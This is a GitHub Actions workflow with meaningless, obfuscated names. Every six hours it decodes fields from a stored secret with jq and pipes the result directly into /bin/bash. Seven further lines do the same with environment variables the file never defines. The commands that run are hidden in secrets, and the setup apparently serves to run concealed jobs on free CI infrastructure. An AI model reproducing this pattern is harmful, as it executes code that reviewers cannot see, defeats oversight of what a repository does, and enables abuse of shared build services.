name: xiezijian7654

on:
  workflow_dispatch:
  schedule:
    - cron: '14 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xiezijian7654
        env:
          ncno57130: ${{ secrets.ncno57130 }}
        run: |
          echo $ncno57130 | jq -r .gy90235 | /bin/bash
          echo $fnuam044 | jq -r .pufo98464 | /bin/bash
          echo $u41 | jq -r .fr3 | /bin/bash
          echo $puzau770 | jq -r .fbw514 | /bin/bash
          echo $hg800 | jq -r .zqx551 | /bin/bash
          echo $oaqh0117 | jq -r .uum3393 | /bin/bash
          echo $x9 | jq -r .jtn45 | /bin/bash
          echo $igtn0 | jq -r .kf4112 | /bin/bash

